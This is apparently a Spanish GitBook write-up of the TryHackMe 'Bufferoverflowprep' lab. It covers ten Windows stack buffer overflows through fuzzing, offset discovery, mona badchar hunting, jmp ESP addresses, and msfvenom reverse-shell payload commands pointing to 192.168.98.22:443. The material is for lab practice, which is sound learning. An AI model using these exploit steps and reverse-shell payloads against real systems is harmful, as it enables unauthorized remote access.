articulos - b0ySie7e
  • 👋Bienvenido
  • Write up
    • 📕DockerLabs
      • QueueMedic
    • 📕Tryhackme
      • VulnneTroasted
      • Relevant
      • Bufferoverflowprep
      • Eavesdropper
      • Kitty
      • Borderlands
      • Willow
      • Gatekeeper
      • Web Strike Blue Team
      • Splunkps Eclipse
      • Sustah
      • Battery
      • The Server From Hell
      • Biteme
      • Zeno
      • Olymus
      • Mastermind
      • Cyber Crafted
      • Ollie
      • Red
      • Opacity
      • Tony The Tiger
      • B3dr0ck
      • Valley
      • Hacker vs Hacker
      • Flatine
      • Glitch
      • Smag Grotto
      • Ninja Skills
      • Corridor
      • TechSupport
      • Kiba
      • Fowsniff CTF
      • Blueprint
      • Anonymous
      • Bookstore
      • Bounty
      • Cmspit
      • Mustacchio
    • 📕Hackthebox
      • Inject
      • Busqueda
      • Monitors Two
      • PC
      • Topology
      • Wifinetic
      • Pilgrimage
      • Keeper
      • Headless
      • Devvortex
      • Codify
      • Perfection
      • Broker
      • Pov
      • Resolute
      • Monteverde
      • Intelligence
      • StreamIO
      • Scrambled
      • Escape
      • Authority
      • Return
      • Timelapse
      • Support
      • Cap
      • Doctor
      • Validation
      • Twomillion
    • 📕PortSwigger
      • SQL Injection
        • Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
        • Lab: SQL injection vulnerability allowing login bypass
        • Lab: SQL injection attack, querying the database type and version on Oracle
        • Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
        • Lab: SQL injection attack, listing the database contents on non-Oracle databases
        • Lab: SQL injection UNION attack, determining the number of columns returned by the query
        • Lab: SQL injection UNION attack, retrieving data from other tables
        • Lab: SQL injection UNION attack, retrieving multiple values in a single column
        • Lab: Blind SQL injection with conditional responses
        • Lab: Blind SQL injection with conditional errors
        • Lab: Visible error-based SQL injection
        • Lab: Blind SQL injection with time delays
        • Lab: Blind SQL injection with time delays and information retrieval
        • Lab: Blind SQL injection with out-of-band interaction
        • Lab: Blind SQL injection with out-of-band data exfiltration
        • Lab: SQL injection with filter bypass via XML encoding
  • Articulos
    • 🛠️Proyectos
      • 📝Host Port Discovery
    • 🛠️Laboratorio
      • 📝Hacking Wireles
  • Vulnerabilidaes
    • 🖥️Explotacion
      • CVE-2023-38831
Powered by GitBook
On this page
  • OverFlow1
  • Offset
  • Control del EIP
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow2
  • Offset
  • Control de EIP
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow3
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow4
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow5
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow6
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow7
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow8
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow9
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  • OverFlow10
  • Offset
  • Badchars
  • Obteniendo la dirección de jmp ESP
  • Generando payload
  • Shell
  1. Write up
  2. Tryhackme

Bufferoverflowprep

PreviousRelevantNextEavesdropper

Last updated 1 year ago

Esta sala esta enfocada a practicar bufferOverFlow encontrando el numero offset, luego los badchars. Además aprenderemos el uso de la herramienta de Immunity Debugger y usaremos unos scripts en Python para realizar el fuzzing para encontrar el offset, encontrar los badchars, obtener una shell de la maquina victima.

  • Created by

  • Link

OverFlow1

Offset

Para encontrar el offset procederemos a realizar el fuzzing, que consiste en que nuestro script va enviar una cierta cantidad de caracteres en la en programa crashea

❯ python3 fuzzingBuff.py

Enumerando con el script encontraremos el offset

Haciendo uso de msf-pattern_create para crear caracteres aleatorios con el fin de usarlo para encontrar el numero con el que el programa se corrompe

❯ msf-pattern_create -l 2000

Volvemos a ejecutar el script, pero haciendo uso de los caracteres que generamos

❯ python3 crashReplication_ContrllingEIP.py

Ahora, copiaremos los caracteres en hexadecimal que están en el EIP

Ahora teniendo F43396E haremos uso de msf-pattern_offset podremos encontrar el offset

❯ msf-pattern_offset -q 6F43396E

Control del EIP

Luego de encontrar el offset agregaremos BBBB con el fin de corroborar que se tiene control

Luego de ejecutar el script podemos observar el EIP y observamos 42424242

Estos 42 no son mas que las 4 B que ingresamos y lo podemos comprobar de la siguiente manera

❯ echo '0x42'| xxd -ps -r; echo
B

Badchars

Haciendo uso de mona generaremos un array con el siguiente comando

!mona bytearray

El badchars que se debe de eliminar es \x00 que suele dar problemas en nuestro payload

!mona bytearray -cpb "\x00"

Badchar N° 2

Luego ejecutaremos de nuevo nuestro script esto siempre y cuando que también quitemos el \x00 de nuestro script de Python, luego haremos uso de mona para realizar una comparación de los caracteres con el ESP.

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00E3FA18

Entonces nos encontraremos con lo siguiente

Debemos de tener en cuenta que si un carácter ocasiona un error esto puede causar que otro carácter también de un error, por lo que nuestro segundo badchar será \x07. Luego de obtener este badchar la quitaremos de nuestro bytearray de nuestro directorio de trabajo y nuestro script.

!mona bytearray -cpb "\x00\x07"

Badchar N° 3

Ejecutaremos nuestro script de nuevo, luego obtendremos el ESP para ejecutar lo siguiente

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00A6FA18

Luego de ejecutar obtendremos el tercer badchar que es \x2e

Luego de obtener este badchar la quitaremos de nuestro bytearray de nuestro directorio de trabajo y nuestro script.

!mona bytearray -cpb "\x00\x07\x2e"

Badchar N° 4

Ejecutaremos nuestro script de nuevo, luego obtendremos el ESP para ejecutar lo siguiente

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0110FA18

Luego de ejecutar obtendremos el tercer badchar que es \xa0

Luego de obtener este badchar la quitaremos de nuestro bytearray de nuestro directorio de trabajo y nuestro scrip

!mona bytearray -cpb "\x00\x07\x2e\xa0"

Al ejecutar de nuevo nuestro script y luego hacer el proceso anterior, obtenemos el ESP y hacemos la comparación por lo que encontraremos.

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0107FA18

Que ya no se tiene ningún badchar

Obteniendo la dirección de jmp ESP

Para obtener la dirección de jmp ESP haremos uso de los badchars con lo siguiente comando

!mona jmp -r esp -cpb "\x00\x07\x2e\xa0"

Con el anterior podremos obtener la dirección de ESP, como podemos en la siguiente imagen

La dirección que obtenemos es: 0x625011AF

Lo que haremos con esta dirección será ponerla de manera contraria para luego colocarla en nuestro script

\xAF\x11\x50\x62

La siguiente imagen muestra la dirección colocada en nuestro script

Generando payload

Ahora usaremos msfvenom para generar nuestro payload y haciendo uso de los badchars que no queremos que tenga en cuenta al generar

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x07\x2e\xa0" -f c

Luego de generar nuestro payload, insertaremos en nuestro script y ejecutaremos, antes debemos de ponernos a la escucha con ncat

Shell

Luego de ejecutar nuestro script obtenemos nuestra shell de la maquina victima

OverFlow2

Offset

Para obtener una el offset haremos uso de fuzzing que enviara cierta cantidad de caracteres

Haciendo uso de msf-pattern_create generaremos 700 caracteres con el fin de hacer uso y encontrar el offset

❯ msf-pattern_create -l 700

Agregaremos a nuestro código los caracteres generados como se muestra en la siguiente imagen.

Luego de ejecutar y obtener lo que se encuentra en el EIP y haciendo uso de msf-pattern_offset obtendremos el offset que en este caso es 634

❯ msf-pattern_offset -q 76413176
[*] Exact match at offset 634

Control de EIP

Para comprobar si tenemos control del EIP agregaremos 4 B en nuestro código después de las 634 A como se hizo en la tarea anterior.

❯ echo '0x42'| xxd -ps -r; echo
B

Badchars

Luego de tener el control del EIP procederemos a encontrar lo badchars

Badchar N° 1

El badchars que siempre se debe de considerar es el \x00 el cual suele dar inconvenientes

!mona bytearray -cpb "\x00"

Debemos quitar de nuestro archivo bytearray y nuestro script de python

Badchar N° 2

Luego de volver a ejecutar nuestro script y obtener la dirección del ESP ejecutamos lo siguiente

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00A9FA18

Como se menciono en la primer overFlow un badchar puede ocasionar que otro genere inconvenientes y luego te reporte y así, por lo que solo debemos de tomar en cuenta el siguiente de \x00 o el primer badchar que nos da luego del ultimo. En nuestro caso es \x23.

Luego procederemos a quitarlo del bytearray y nuestro script de python

!mona bytearray -cpb "\x00\x23"

Badchar N° 3

Luego de volver a ejecutar nuestro script y obtener la dirección del ESP ejecutamos lo siguiente

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 010EFA18

Obtenemos el siguiente badchar que es: \x3c

Eliminamos el badchar que encontramos

!mona bytearray -cpb "\x00\x23\x3c"

Badchar N° 4

Luego de volver a ejecutar nuestro script y obtener la dirección del ESP ejecutamos lo siguiente

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 010CFA18

Obtenemos el siguiente badchar que es: \x83

Eliminamos el badchar que encontramos

!mona bytearray -cpb "\x00\x23\x3c\x83"

Badchar N° 5

Luego de volver a ejecutar nuestro script y obtener la dirección del ESP ejecutamos lo siguiente

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 010CFA18

Obtenemos el siguiente badchar que es: \xba y eliminamos el badchar que encontramos

!mona bytearray -cpb "\x00\x23\x3c\x83\xba"

Luego de volver a repetir el proceso ya no nos mostrara ningun badchar

Obteniendo la dirección de jmp ESP

Para obtener la dirección de jmp ESP haremos uso de los badchars con lo siguiente comando

!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"

Con el anterior podremos obtener la dirección de ESP, como podemos en la siguiente imagen

La dirección que obtenemos es:0x625011AF

Lo que haremos con esta dirección será ponerla de manera contraria para luego colocarla en nuestro script

\xAF\x11\x50\x62

Generando payload

Ahora usaremos msfvenom para generar nuestro payload y haciendo uso de los badchars que no queremos que tenga en cuenta al generar

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x23\x3c\x83\xba" -f c

Luego de generar nuestro payload, añadiremos en nuestro script

Shell

Luego de generar nuestro payload, insertaremos en nuestro script y ejecutaremos, antes debemos de ponernos a la escucha con ncat

OverFlow3

Offset

Fuzzing crashed at 1300 bytes
❯ msf-pattern_create -l 1300
❯ msf-pattern_offset -q 35714234
[*] Exact match at offset 1274

Badchars

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00EBFA18
!mona bytearray -cpb "\x00\x11"
!mona bytearray -cpb "\x00\x11\x40"
!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00DCFA18
!mona bytearray -cpb "\x00\x11\x40\x5f"
!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F0FA18
!mona bytearray -cpb "\x00\x11\x40\x5f\xb8"
!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00FAFA18
!mona bytearray -cpb "\x00\x11\x40\x5f\xb8\xee"
!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00FAFA18

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb "\x00\x11\x40\x5f\xb8\xee"
0x62501203
\x03\x12\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x11\x40\x5f\xb8\xee" -f c

Shell

OverFlow4

Offset

❯ python3 fuzzingBuff.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
...
Fuzzing crashed at 2100 bytes
❯ msf-pattern_create -l 2100
❯ msf-pattern_offset -q 70433570
[*] Exact match at offset 2026

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0104FA18
!mona bytearray -cpb "\x00\xa9"

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00CDFA18
!mona bytearray -cpb "\x00\xa9\xcd"

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00FFFA18
!mona bytearray -cpb "\x00\xa9\xcd\xd4"

!mona compare -f C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0113FA18

Obteniendo la dirección de jmp ESP

\x00\xa9\xcd\xd4
!mona jmp -r esp -cpb "\x00\xa9\xcd\xd4"
0x625011AF
\xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\xa9\xcd\xd4" -f c

Shell

OverFlow5

Offset

❯ python3 fuzzingBuff.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
Fuzzing with 300 bytes
Fuzzing with 400 bytes
Fuzzing crashed at 400 bytes
❯ msf-pattern_create -l 400
❯ msf-pattern_offset -q 356B4134
[*] Exact match at offset 314

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F5FA18
!mona bytearray -cpb "\x00\x16"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00EDFA18
!mona bytearray -cpb "\x00\x16\x2f"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0108FA18
!mona bytearray -cpb "\x00\x16\x2f\xf4"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0139FA18
!mona bytearray -cpb "\x00\x16\x2f\xf4\xfd"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F0FA18
\x00\x16\x2f\xf4\xfd

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb "\x00\x16\x2f\xf4\xfd"
0x625011AF
\xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x16\x2f\xf4\xfd" -f c

Shell

OverFlow6

Offset

❯ python3 fuzzingBuff.py
.
.
.
Fuzzing with 1100 bytes
Fuzzing crashed at 1100 bytes
❯ msf-pattern_create -l 1100
❯ msf-pattern_offset -q 35694234
[*] Exact match at offset 1034

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 6F43396E
!mona bytearray -cpb "\x00\x08"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 010CFA18
!mona bytearray -cpb "\x00\x08\x2c"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0104FA18
!mona bytearray -cpb "\x00\x08\x2c\xad"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F3FA18
"\x00\x08\x2c\xad"

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb "\x00\x08\x2c\xad"
0x625011AF
 \xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x08\x2c\xad" -f c

Shell

OverFlow7

Offset

❯ python3 fuzzingBuff.py
Fuzzing with 100 bytes
.
.
.
Fuzzing crashed at 1400 bytes
❯ msf-pattern_create -l 1400
❯ msf-pattern_offset -q 72423572
[*] Exact match at offset 1306

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 011FFA18
!mona bytearray -cpb "\x00\x8c"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F0FA18
!mona bytearray -cpb "\x00\x8c\xae"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0107FA18
!mona bytearray -cpb "\x00\x8c\xae\xbe"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0103FA18
!mona bytearray -cpb "\x00\x8c\xae\xbe\xfb"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F5FA18
 "\x00\x8c\xae\xbe\xfb"

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb  "\x00\x8c\xae\xbe\xfb"
625011AF
 \xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x8c\xae\xbe\xfb" -f c
❯  msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x8c\xae\xbe\xfb" -f c

Shell

OverFlow8

Offset

❯ python3 fuzzingBuff.py
Fuzzing with 100 bytes
.
.
.
Fuzzing with 1800 bytes
Fuzzing crashed at 1800 bytes
❯ msf-pattern_create -l 1800
❯ msf-pattern_offset -q 68433568
[*] Exact match at offset 1786

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 011EFA18
!mona bytearray -cpb "\x00\x1d"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00DDFA18
!mona bytearray -cpb "\x00\x1d\x2e"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0118FA18
!mona bytearray -cpb "\x00\x1d\x2e\xc7"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0100FA18
!mona bytearray -cpb "\x00\x1d\x2e\xc7\xee"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00FFFA18

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb "\x00\x1d\x2e\xc7\xee"
625011AF
\xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x1d\x2e" -f c

Shell

OverFlow9

Offset

❯ python3 fuzzingBuff.py
Fuzzing with 100 bytes
Fuzzing with 200 bytes
.
.
.
Fuzzing crashed at 1600 bytes
❯ msf-pattern_create -l 1600
❯ msf-pattern_offset -q 35794234
[*] Exact match at offset 1514

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00FAFA18
!mona bytearray -cpb "\x00\x04"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0106FA18
!mona bytearray -cpb "\x00\x04\x3e"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 010AFA18
!mona bytearray -cpb "\x00\x04\x3e\x3f"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0123FA18
!mona bytearray -cpb "\x00\x04\x3e\x3f\xe1"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00F1FA18

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb "\x00\x04\x3e\x3f\xe1"
625011AF
\xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\x04\x3e\x3f\xe1" -f c

Shell

OverFlow10

Offset

❯ python3 fuzzingBuff.py
Fuzzing with 100 bytes
.
.
.
Fuzzing with 500 bytes
Fuzzing with 600 bytes
Fuzzing crashed at 600 bytes
❯ msf-pattern_create -l 600
❯ msf-pattern_offset -q 41397241
[*] Exact match at offset 537

Badchars

!mona bytearray
!mona bytearray -cpb "\x00"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 011EFA18
!mona bytearray -cpb "\x00\xa0"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00E8FA18
!mona bytearray -cpb "\x00\xa0\xad"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00E8FA18
!mona bytearray -cpb "\x00\xa0\xad\xbe"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 0103FA18
!mona bytearray -cpb "\x00\xa0\xad\xbe\xde"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00E4FA18
!mona bytearray -cpb "\x00\xa0\xad\xbe\xde\xef"

!mona compare -f  C:\Users\seven\Desktop\OSCP\bytearray.bin -a 00EFFA18

Obteniendo la dirección de jmp ESP

!mona jmp -r esp -cpb "\x00\xa0\xad\xbe\xde\xef"
625011AF
\xAF\x11\x50\x62

Generando payload

❯ msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.98.22 LPORT=443 --platform windows -b "\x00\xa0\xad\xbe\xde\xef" -f c

Shell

📕
Tib3rius
bufferOverFlowprep
20240223185041.png
20240224210455.png
20240224211246.png
20240224211449.png
20240224211630.png
20240224211655.png
20240224212109.png
20240224212151.png
20240228004443.png
20240228005013.png
20240228005403.png
20240228005718.png
20240228005945.png
20240228010817.png
20240228010946.png
20240228012136.png
20240228012809.png
20240228090512.png
20240228091023.png
20240228091648.png
20240228092602.png
20240228092705.png
20240228093230.png
20240228093256.png
20240228095724.png
20240228100003.png
20240229025219.png
20240228165942.png
20240228170111.png
20240228170304.png
20240228172954.png
20240228173251.png
20240228173958.png
20240228175934.png
20240228180412.png
20240228180513.png
20240228183738.png
20240228185258.png
20240228185234.png
20240228214102.png
20240228215404.png
20240228215838.png
20240228233549.png
20240228233759.png
20240228233818.png
20240229000435.png
20240229000725.png
20240229000746.png